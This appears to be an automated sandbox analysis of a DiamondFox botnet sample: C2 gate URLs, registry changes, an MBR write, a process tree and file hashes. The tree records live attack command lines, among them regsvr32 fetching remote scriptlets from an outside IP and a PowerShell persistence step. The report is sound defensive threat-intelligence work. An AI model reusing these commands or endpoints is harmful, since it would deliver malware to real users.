diamondfox | hxxp://148[.]163[.]12[.]101/WMndFrdk?keyword=Other&cost=0[.]00040&ad_campaign_id=262704&source=145866

Analysis

max time kernel
142s
max time network
145s
platform
windows7_x64
resource
win7v20201028
submitted
11-11-2020 15:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://148.163.12.101/WMndFrdk?keyword=Other&cost=0.00040&ad_campaign_id=262704&source=145866
Sample

201111-nw5jsw7ban

Score

10^/10

diamondfox bootkit botnet persistence stealer

Malware Config

Extracted

Family

diamondfox

https://www.datanalysis.club/ms/gate.php

https://www.datanalysis.site/ms/gate.php

https://www.datanalysis.space/ms/gate.php

Mutex

cBFxpht5aCf0jy4gnUs3JgtqCB2O2tWJ

xor.plain

Signatures

DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
botnet stealer diamondfox

DiamondFox payload 6 IoCs

Detects DiamondFox payload in file/memory.

Processes:

resource	yara_rule
\Users\Admin\AppData\Roaming\setup.exe	diamondfox
C:\Users\Admin\AppData\Roaming\setup.exe	diamondfox
C:\Users\Admin\AppData\Roaming\setup.exe	diamondfox
\Users\Admin\AppData\Roaming\setup.exe	diamondfox
\Users\Admin\AppData\Roaming\setup.exe	diamondfox
\Users\Admin\AppData\Roaming\setup.exe	diamondfox

Blacklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

15 1504 rundll32.exe
Executes dropped EXE 1 IoCs

Processes:

setup.exe

pid process

1304 setup.exe

flow	pid	process
15	1504	rundll32.exe

pid	process
1304	setup.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

dllhost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dllhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dllhost.exe

Loads dropped DLL 9 IoCs

Processes:

regsvr32.exerundll32.exedllhost.exesetup.exe

pid process

296 regsvr32.exe
1504 rundll32.exe
1504 rundll32.exe
1504 rundll32.exe
1504 rundll32.exe
1628 dllhost.exe
1304 setup.exe
1304 setup.exe
1304 setup.exe
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

dllhost.exe

description ioc process

File opened for modification \??\PhysicalDrive0 dllhost.exe

pid	process
296	regsvr32.exe
1504	rundll32.exe
1504	rundll32.exe
1504	rundll32.exe
1504	rundll32.exe
1628	dllhost.exe
1304	setup.exe
1304	setup.exe
1304	setup.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	dllhost.exe

Modifies Internet Explorer settings 1 TTPs 39 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEiexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{21197C01-2430-11EB-95E5-6E84FEE6C902} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30af44f03cb8d601	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage\213.159.203.207\NumberOfSubdomains = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage\213.159.203.207	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a600000000002000000000010660000000100002000000026b1a463cc4bdf8691f7701764a745816396c450b21a51436c7ce6ee5a63a530000000000e8000000002000020000000f3ab42104ed4a177ce05d94eed8a41d11c8e7e7ac369f59e5272dc7423833e2a200000009be94dd8a85f581d45082ad65597e56a0f74041ec75db1f739a5ad9d8221cc6040000000a374d9f4f49f67479e6ebd16acf618abd0a2f3524eb28363eac3682ca11c7332b55fe98f806950692ffbfc6184b14310ad10352a8f20dfbe107d3315041d063a	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "311872445"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a60000000000200000000001066000000010000200000008c62236307e11e50843995c0b19378a170a025f4bb911ba899f1b275180b88ee000000000e8000000002000020000000e9bf1e406a01d0a34c13d440c423b0f866e5caccfee43733c9791a5da21a3db19000000026ee0a5bba7fb3edfa6fe2ede6968480990af50560a51cc2b38b87db42ae14f631c64e3e14a1ac38d12bb49d1add09ad43df952596d889837fd885f9aa61e82f8f9e83b942c11857539605da6b7acdbaf7f773c2d4a30970f6b4c4986c15f5b788153d398771972074d1ca136b8b5e84d0a45d02831ea617d40ee161f8414dfb310a3719a5b19cc200d119ad46bbb3714000000003de3846ce895e63c4cfd0138ab29584a24ef816e7c6ce0bece6bada2c11f6fae8b800b974abbc50ce748a234cbcf2a7673be647d6b53aef586292cf0868bcaa	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe

Modifies registry class 20 IoCs

Processes:

regsvr32.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\OCRExam.1.00\CLSID	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20001111-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID\ = "OCRExam"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20001111-0000-0000-0000-0000FEEDACDC}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\OCRExam\ = "OCRExam"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\OCRExam\CLSID	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20001111-0000-0000-0000-0000FEEDACDC}\ScriptletURL	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20001111-0000-0000-0000-0000FEEDACDC}\ScriptletURL\ = "http://213.159.203.207/views/2k3q71jgf50687rn608khb81nk.sct"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\OCRExam	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\OCRExam\CLSID\ = "{20001111-0000-0000-0000-0000FEEDACDC}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\OCRExam.1.00\ = "OCRExam"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20001111-0000-0000-0000-0000FEEDACDC}\ProgID	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20001111-0000-0000-0000-0000FEEDACDC}\ProgID\ = "OCRExam.1.00"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20001111-0000-0000-0000-0000FEEDACDC}\InprocServer32\ = "C:\\Windows\\SysWOW64\\scrobj.dll"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20001111-0000-0000-0000-0000FEEDACDC}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\OCRExam.1.00	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\OCRExam.1.00\CLSID\ = "{20001111-0000-0000-0000-0000FEEDACDC}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20001111-0000-0000-0000-0000FEEDACDC}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20001111-0000-0000-0000-0000FEEDACDC}\ = "OCRExam"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20001111-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

dllhost.exepowershell.exe

pid process

1628 dllhost.exe
1628 dllhost.exe
840 powershell.exe
840 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

rundll32.exe

pid process

1504 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 840 powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

1960 iexplore.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

iexplore.exeIEXPLORE.EXEsetup.exe

pid process

1960 iexplore.exe
1960 iexplore.exe
1788 IEXPLORE.EXE
1788 IEXPLORE.EXE
1788 IEXPLORE.EXE
1788 IEXPLORE.EXE
1304 setup.exe

pid	process
1628	dllhost.exe
1628	dllhost.exe
840	powershell.exe
840	powershell.exe

pid	process
1504	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	840	powershell.exe

pid	process
1960	iexplore.exe

pid	process
1960	iexplore.exe
1960	iexplore.exe
1788	IEXPLORE.EXE
1788	IEXPLORE.EXE
1788	IEXPLORE.EXE
1788	IEXPLORE.EXE
1304	setup.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

iexplore.exeIEXPLORE.EXEregsvr32.exeregsvr32.exerundll32.exedllhost.exesetup.exe

description	pid	process	target process
PID 1960 wrote to memory of 1788	1960	iexplore.exe	IEXPLORE.EXE
PID 1960 wrote to memory of 1788	1960	iexplore.exe	IEXPLORE.EXE
PID 1960 wrote to memory of 1788	1960	iexplore.exe	IEXPLORE.EXE
PID 1960 wrote to memory of 1788	1960	iexplore.exe	IEXPLORE.EXE
PID 1788 wrote to memory of 1452	1788	IEXPLORE.EXE	regsvr32.exe
PID 1788 wrote to memory of 1452	1788	IEXPLORE.EXE	regsvr32.exe
PID 1788 wrote to memory of 1452	1788	IEXPLORE.EXE	regsvr32.exe
PID 1788 wrote to memory of 1452	1788	IEXPLORE.EXE	regsvr32.exe
PID 1788 wrote to memory of 1452	1788	IEXPLORE.EXE	regsvr32.exe
PID 1788 wrote to memory of 1452	1788	IEXPLORE.EXE	regsvr32.exe
PID 1788 wrote to memory of 1452	1788	IEXPLORE.EXE	regsvr32.exe
PID 1452 wrote to memory of 296	1452	regsvr32.exe	regsvr32.exe
PID 1452 wrote to memory of 296	1452	regsvr32.exe	regsvr32.exe
PID 1452 wrote to memory of 296	1452	regsvr32.exe	regsvr32.exe
PID 1452 wrote to memory of 296	1452	regsvr32.exe	regsvr32.exe
PID 1452 wrote to memory of 296	1452	regsvr32.exe	regsvr32.exe
PID 1452 wrote to memory of 296	1452	regsvr32.exe	regsvr32.exe
PID 1452 wrote to memory of 296	1452	regsvr32.exe	regsvr32.exe
PID 296 wrote to memory of 1504	296	regsvr32.exe	rundll32.exe
PID 296 wrote to memory of 1504	296	regsvr32.exe	rundll32.exe
PID 296 wrote to memory of 1504	296	regsvr32.exe	rundll32.exe
PID 296 wrote to memory of 1504	296	regsvr32.exe	rundll32.exe
PID 296 wrote to memory of 1504	296	regsvr32.exe	rundll32.exe
PID 296 wrote to memory of 1504	296	regsvr32.exe	rundll32.exe
PID 296 wrote to memory of 1504	296	regsvr32.exe	rundll32.exe
PID 1504 wrote to memory of 1628	1504	rundll32.exe	dllhost.exe
PID 1504 wrote to memory of 1628	1504	rundll32.exe	dllhost.exe
PID 1504 wrote to memory of 1628	1504	rundll32.exe	dllhost.exe
PID 1504 wrote to memory of 1628	1504	rundll32.exe	dllhost.exe
PID 1628 wrote to memory of 1304	1628	dllhost.exe	setup.exe
PID 1628 wrote to memory of 1304	1628	dllhost.exe	setup.exe
PID 1628 wrote to memory of 1304	1628	dllhost.exe	setup.exe
PID 1628 wrote to memory of 1304	1628	dllhost.exe	setup.exe
PID 1628 wrote to memory of 1304	1628	dllhost.exe	setup.exe
PID 1628 wrote to memory of 1304	1628	dllhost.exe	setup.exe
PID 1628 wrote to memory of 1304	1628	dllhost.exe	setup.exe
PID 1304 wrote to memory of 840	1304	setup.exe	powershell.exe
PID 1304 wrote to memory of 840	1304	setup.exe	powershell.exe
PID 1304 wrote to memory of 840	1304	setup.exe	powershell.exe
PID 1304 wrote to memory of 840	1304	setup.exe	powershell.exe
PID 1304 wrote to memory of 840	1304	setup.exe	powershell.exe
PID 1304 wrote to memory of 840	1304	setup.exe	powershell.exe
PID 1304 wrote to memory of 840	1304	setup.exe	powershell.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://148.163.12.101/WMndFrdk?keyword=Other&cost=0.00040&ad_campaign_id=262704&source=145866
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1960

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1960 CREDAT:275457 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1788

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s /i:"http://213.159.203.207/views/2k3q71jgf50687rn608khb81nk.sct" scrobj.dll
3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1452

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s /n /i:"http://213.159.203.207/views/mg45vvc58qjg9rr9lsk7om3abk.wav" "C:\Users\Admin\AppData\Local\Temp\nsu175B7D93690.tmp.dll"
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:296

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\nsu175B7D93690.tmp.dll",CPAILoad KDYFKTCFSL
5⤵
- Blacklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1504

C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\system32\dllhost.exe"
6⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1628

C:\Users\Admin\AppData\Roaming\setup.exe
"C:\Users\Admin\AppData\Roaming\setup.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Copy-Item -Path 'C:\Users\Admin\AppData\Roaming\setup.exe' -Destination 'C:\Users\Admin\AppData\Local\tiedaxx\atiedxx.exe';Start-Sleep -s 60;Start-Process 'C:\Users\Admin\AppData\Local\tiedaxx\atiedxx.exe'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:840

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Bootkit

T1067

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
baa56973ae3f0865733e888ae2a77d68

SHA1
4bed355f31de4e4858d8794b71c31022d5f4af43

SHA256
9ff4c136827d5580235b217812997cf76aea150857fa3d514e6474677b2b6a9b

SHA512
2a5c090462864820f30336bd33153e0abb4e00b72b35a47e6d4d7d6007ab25943a7f5b591d22279429757af91c22536ccb94b7231940006abc21ee208fd074fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsu175B7D93690.tmp.dll
MD5
31afa7979b4dd60b0680558f2dd1bb99

SHA1
80cadd169206c58bf053be3166f08d2d7e821c63

SHA256
86ebac5645ca17fbd444b88480aefc381ac1a777542f158fcb42121b5d7d0f2a

SHA512
31f8d7b3e36d706de8c6cee4a5e9fab55f1c76d3fe81404acc0e1c9cc13cb18373bac2c462df15ecea5b91f046661cc0982a84db324d127f114acdc58b6ebaff

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\GKLWFJS7.txt
MD5
6da38cf4f375ae1c59e2cf21557021f7

SHA1
967924b01c8acd16276f8fe9caf180751fe34173

SHA256
ca1a551bdee55bf1bbf0717655d633af482b098f1e415acfe18a79680af5bd9d

SHA512
660b06d45b83a05c6bdca25ad614746f3c21e68b156018065f9c13df42132052e2737ed691775b6aca0c8a40b73fd71fb1dd92d4ab84590a2697dece2382f10a

Download Submit
C:\Users\Admin\AppData\Roaming\setup.exe
MD5
1d5b46ff3cd12fd31362557299d6f488

SHA1
42f5d828b03f5e4c03e9f935683b5d82e6e7dc26

SHA256
2f134d1467c3765898a1befc311b86414f8df96d307a6f05b23eebbb8866a69c

SHA512
4dd2071b369bd150da53446313fff30b08054b8724a02444c400db2f0b14062c51a5aff2390b1845cc87b629ffc77ecc5e72877f77f824553b6f68a7b39a9d23

Download Submit
C:\Users\Admin\AppData\Roaming\setup.exe
MD5
1d5b46ff3cd12fd31362557299d6f488

SHA1
42f5d828b03f5e4c03e9f935683b5d82e6e7dc26

SHA256
2f134d1467c3765898a1befc311b86414f8df96d307a6f05b23eebbb8866a69c

SHA512
4dd2071b369bd150da53446313fff30b08054b8724a02444c400db2f0b14062c51a5aff2390b1845cc87b629ffc77ecc5e72877f77f824553b6f68a7b39a9d23

Download Submit
\Users\Admin\AppData\Local\Temp\nsu175B7D93690.tmp.dll
MD5
31afa7979b4dd60b0680558f2dd1bb99

SHA1
80cadd169206c58bf053be3166f08d2d7e821c63

SHA256
86ebac5645ca17fbd444b88480aefc381ac1a777542f158fcb42121b5d7d0f2a

SHA512
31f8d7b3e36d706de8c6cee4a5e9fab55f1c76d3fe81404acc0e1c9cc13cb18373bac2c462df15ecea5b91f046661cc0982a84db324d127f114acdc58b6ebaff

Download Submit
\Users\Admin\AppData\Local\Temp\nsu175B7D93690.tmp.dll
MD5
31afa7979b4dd60b0680558f2dd1bb99

SHA1
80cadd169206c58bf053be3166f08d2d7e821c63

SHA256
86ebac5645ca17fbd444b88480aefc381ac1a777542f158fcb42121b5d7d0f2a

SHA512
31f8d7b3e36d706de8c6cee4a5e9fab55f1c76d3fe81404acc0e1c9cc13cb18373bac2c462df15ecea5b91f046661cc0982a84db324d127f114acdc58b6ebaff

Download Submit
\Users\Admin\AppData\Local\Temp\nsu175B7D93690.tmp.dll
MD5
31afa7979b4dd60b0680558f2dd1bb99

SHA1
80cadd169206c58bf053be3166f08d2d7e821c63

SHA256
86ebac5645ca17fbd444b88480aefc381ac1a777542f158fcb42121b5d7d0f2a

SHA512
31f8d7b3e36d706de8c6cee4a5e9fab55f1c76d3fe81404acc0e1c9cc13cb18373bac2c462df15ecea5b91f046661cc0982a84db324d127f114acdc58b6ebaff

Download Submit
\Users\Admin\AppData\Local\Temp\nsu175B7D93690.tmp.dll
MD5
31afa7979b4dd60b0680558f2dd1bb99

SHA1
80cadd169206c58bf053be3166f08d2d7e821c63

SHA256
86ebac5645ca17fbd444b88480aefc381ac1a777542f158fcb42121b5d7d0f2a

SHA512
31f8d7b3e36d706de8c6cee4a5e9fab55f1c76d3fe81404acc0e1c9cc13cb18373bac2c462df15ecea5b91f046661cc0982a84db324d127f114acdc58b6ebaff

Download Submit
\Users\Admin\AppData\Local\Temp\nsu175B7D93690.tmp.dll
MD5
31afa7979b4dd60b0680558f2dd1bb99

SHA1
80cadd169206c58bf053be3166f08d2d7e821c63

SHA256
86ebac5645ca17fbd444b88480aefc381ac1a777542f158fcb42121b5d7d0f2a

SHA512
31f8d7b3e36d706de8c6cee4a5e9fab55f1c76d3fe81404acc0e1c9cc13cb18373bac2c462df15ecea5b91f046661cc0982a84db324d127f114acdc58b6ebaff

Download Submit
\Users\Admin\AppData\Roaming\setup.exe
MD5
1d5b46ff3cd12fd31362557299d6f488

SHA1
42f5d828b03f5e4c03e9f935683b5d82e6e7dc26

SHA256
2f134d1467c3765898a1befc311b86414f8df96d307a6f05b23eebbb8866a69c

SHA512
4dd2071b369bd150da53446313fff30b08054b8724a02444c400db2f0b14062c51a5aff2390b1845cc87b629ffc77ecc5e72877f77f824553b6f68a7b39a9d23

Download Submit
\Users\Admin\AppData\Roaming\setup.exe
MD5
1d5b46ff3cd12fd31362557299d6f488

SHA1
42f5d828b03f5e4c03e9f935683b5d82e6e7dc26

SHA256
2f134d1467c3765898a1befc311b86414f8df96d307a6f05b23eebbb8866a69c

SHA512
4dd2071b369bd150da53446313fff30b08054b8724a02444c400db2f0b14062c51a5aff2390b1845cc87b629ffc77ecc5e72877f77f824553b6f68a7b39a9d23

Download Submit
\Users\Admin\AppData\Roaming\setup.exe
MD5
1d5b46ff3cd12fd31362557299d6f488

SHA1
42f5d828b03f5e4c03e9f935683b5d82e6e7dc26

SHA256
2f134d1467c3765898a1befc311b86414f8df96d307a6f05b23eebbb8866a69c

SHA512
4dd2071b369bd150da53446313fff30b08054b8724a02444c400db2f0b14062c51a5aff2390b1845cc87b629ffc77ecc5e72877f77f824553b6f68a7b39a9d23

Download Submit
\Users\Admin\AppData\Roaming\setup.exe
MD5
1d5b46ff3cd12fd31362557299d6f488

SHA1
42f5d828b03f5e4c03e9f935683b5d82e6e7dc26

SHA256
2f134d1467c3765898a1befc311b86414f8df96d307a6f05b23eebbb8866a69c

SHA512
4dd2071b369bd150da53446313fff30b08054b8724a02444c400db2f0b14062c51a5aff2390b1845cc87b629ffc77ecc5e72877f77f824553b6f68a7b39a9d23

Download Submit
memory/296-6-0x0000000000000000-mapping.dmp

Download
memory/840-31-0x0000000000590000-0x0000000000591000-memory.dmp

Filesize
4KB

Download
memory/840-34-0x0000000004870000-0x0000000004871000-memory.dmp

Filesize
4KB

Download
memory/840-51-0x00000000065F0000-0x00000000065F1000-memory.dmp

Filesize
4KB

Download
memory/840-50-0x00000000063A0000-0x00000000063A1000-memory.dmp

Filesize
4KB

Download
memory/840-43-0x00000000062A0000-0x00000000062A1000-memory.dmp

Filesize
4KB

Download
memory/840-42-0x0000000006200000-0x0000000006201000-memory.dmp

Filesize
4KB

Download
memory/840-29-0x0000000000000000-mapping.dmp

Download
memory/840-30-0x000000006EBE0000-0x000000006F2CE000-memory.dmp

Filesize
6.9MB

Download
memory/840-37-0x00000000057C0000-0x00000000057C1000-memory.dmp

Filesize
4KB

Download
memory/840-32-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

Filesize
4KB

Download
memory/840-33-0x00000000023F0000-0x00000000023F1000-memory.dmp

Filesize
4KB

Download
memory/1304-21-0x0000000000000000-mapping.dmp

Download
memory/1452-5-0x0000000000000000-mapping.dmp

Download
memory/1504-9-0x0000000000000000-mapping.dmp

Download
memory/1532-0-0x000007FEF5E90000-0x000007FEF610A000-memory.dmp

Filesize
2.5MB

Download
memory/1628-14-0x0000000000000000-mapping.dmp

Download
memory/1788-1-0x0000000000000000-mapping.dmp

Download
memory/1788-17-0x000000000B030000-0x000000000B085000-memory.dmp

Filesize
340KB

Download